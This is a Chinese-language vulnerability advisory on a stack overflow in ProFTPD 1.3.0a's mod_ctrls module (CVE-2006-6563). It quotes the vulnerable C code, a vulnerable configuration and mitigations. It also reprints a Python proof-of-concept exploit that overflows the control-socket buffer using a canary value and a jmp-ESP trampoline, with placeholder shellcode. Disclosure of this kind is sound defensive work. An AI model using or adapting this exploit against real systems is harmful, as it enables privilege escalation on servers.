安全研究
安全漏洞
ProFTPD mod_ctrls模块本地栈溢出漏洞
发布日期:2006-12-13
更新日期:2006-12-18
受影响系统:
ProFTPD Project ProFTPD 1.3.0a描述:
ProFTPD Project ProFTPD 1.3
BUGTRAQ ID: 21587
CVE(CAN) ID: CVE-2006-6563
ProFTPD是一款开放源代码FTP服务程序。
ProFTPD服务器的mod_ctrls模块中存在栈溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
在src/ctrls.c文件的pr_ctrls_recv_request()函数中漏洞代码如下:
----------------------------------------------------
(Code from ProFTPD 1.3.0a, src/ctrls.c )
int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
char reqaction[512] = {'\0'}, *reqarg = NULL;
size_t reqargsz = 0;
unsigned int nreqargs = 0, reqarglen = 0;
.
.
.
/* Next, read in the requested number of arguments. The client sends
* the arguments in pairs: first the length of the argument, then the
* argument itself. The first argument is the action, so get the first
* matching pr_ctrls_t (if present), and add the remaining arguments to it.
*/
(1)
if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) {
pr_signals_unblock();
return -1;
}
(2)
if (read(cl->cl_fd, reqaction, reqarglen) < 0) {
pr_signals_unblock();
return -1;
}
.
.
.
}
----------------------------------------------------
在(1)整数reqarglen是攻击者完全可控的,这允许攻击者控制在(2)中读取到reqaction变量中的数量。
proftpd.conf中有漏洞配置示例:
<IfModule mod_ctrls.c>
ControlsEngine on
ControlsACLs all allow group someuser
ControlsMaxClients 2
ControlsLog /var/log/proftpd/controls.log
ControlsInterval 5
ControlsSocket /tmp/ctrls.sock
ControlsSocketOwner someuser someuser
ControlsSocketACL allow group someuser
</IfModule>
成功攻击允许攻击者以提升的权限执行任意代码,但要求必须使用了mod_ctrl模块且ACL允许攻击者访问该模块。
<*来源:Alfredo Ortega
链接:http://secunia.com/advisories/23371/
http://marc.theaimsgroup.com/?l=bugtraq&m=116604875913163&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import socket
import os, os.path,stat
#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"
#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode
#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)
#Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")
s.send(payload)
#Finished
#
s.close()
- ----------------------------------------------------
建议:
临时解决方法:
* 关闭mod_ctrls模块,向proftpd.conf添加以下行:
<IfModule mod_ctrls.c>
ControlsEngine off
</IfModule>
或者,管理员可使用ControlsACLs指令仅限可信任的本地用户访问。
厂商补丁:
ProFTPD Project
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.0a.tar.bz2
浏览次数:3467
严重程度:0(网友投票)
绿盟科技给您安全的保障